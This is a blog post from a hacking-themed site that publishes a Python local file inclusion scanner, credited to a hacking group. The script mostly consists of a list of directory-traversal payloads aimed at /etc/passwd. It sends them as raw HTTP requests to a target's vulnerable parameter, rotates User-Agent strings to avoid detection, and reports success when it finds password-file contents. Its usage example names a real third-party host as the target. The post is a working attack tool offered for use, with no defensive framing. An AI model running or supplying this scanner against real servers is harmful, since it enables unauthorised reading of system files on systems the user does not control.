BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Tuesday, April 24, 2012

Local File Include Scaner

0 comments

Code:
# Author: parkdream1
# Messenger: h3x4r
# Local File Include Scaner
Code:
Usage: h3x4r.py <Target IP> <Port> <Path>
Example: python h3x4r.py playerstage.sourceforge.net 80 index.php?src=
Information
-- Random User-Agent
-- Coded Use Language Python

Banner()



Not Vulnerability




Vulnerability





Code:
#!/usr/bin/python
# Author: parkdream1
# Messenger: h3x4r
# (c) R00TW0RM - Private Community
# https://r00tw0rm.com/
# Local File Include Scaner
# Greets: To all members of r00tw0rm !!

import socket,sys,re,random,time
from random import choice

passwd = ["/etc/passwd",
    "../etc/passwd",
    "../../etc/passwd",
    "../../../etc/passwd",
    "../../../../etc/passwd",
    "../../../../../etc/passwd",
    "../../../../../../etc/passwd",
    "../../../../../../../etc/passwd",
    "../../../../../../../../etc/passwd",
    "../../../../../../../../../etc/passwd",
    "../../../../../../../../../../etc/passwd",
    "../../../../../../../../../../../etc/passwd",
    "../../../../../../../../../../../../etc/passwd",
    "../../../../../../../../../../../../../etc/passwd"
    "/etc/passwd",
    "../etc/passwd",
    "../../etc/passwd",
    "../../../etc/passwd",
    "../../../../etc/passwd",
    "../../../../../etc/passwd",
    "../../../../../../etc/passwd",
    "../../../../../../../etc/passwd",
    "../../../../../../../../etc/passwd",
    "../../../../../../../../../etc/passwd",
    "../../../../../../../../../../etc/passwd",
    "../../../../../../../../../../../etc/passwd",
    "../../../../../../../../../../../../etc/passwd",
    "../../../../../../../../../../../../../etc/passwd"]

user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
    'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
    'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
    'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
    'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
    'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
    'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
    'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']

agent = random.choice(user)

def scan():
    for lfi in passwd:
        try:   
            r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            r.connect((target, port))
            r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
            r.send("Host: "+target+"\r\n")
            r.send("User-Agent: "+agent+"\r\n\r\n")
            print "[*] Send Request Success"
            print "http://"+target+"/"+path+lfi
            page = r.recv(1024)
            fullpage = ""
            while len(page):
                fullpage = fullpage + page
                page = r.recv(1024)
            r.close()
        except Exception, e:
            print "[-] Cant Not Send Request"
            print e
            sys.exit(1)
        r00t = re.search("root:x:0:0:",fullpage)
        if r00t:
            print "\033[32m[*] Request Vulnerability\n"
            sys.exit(1)
        else:
            print "[-] Request Is Not Vulnerability\n"
        time.sleep(1)

def banner():
    print "\n"
    print "****************************************************************************"
    print "||                               Local File Include Scaner                ||"
    print "||                                    by parkdream1                       ||"
    print "||                               (c) R00TW0RM - Private Community         ||"
    print "                             Fucking from "+target+" on port "+str(port)
    print "****************************************************************************"
    print "\n"
 
if __name__ == '__main__':
    if len(sys.argv) != 4:
        print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
        print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 index.php?src="
        sys.exit(1)

    target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
 
    banner()
    scan()

©2012, copyright BLACK BURN

0 comments:

Post a Comment

 

7 Years Earning Experience

The Earning Source You Can Trust

Follow by Email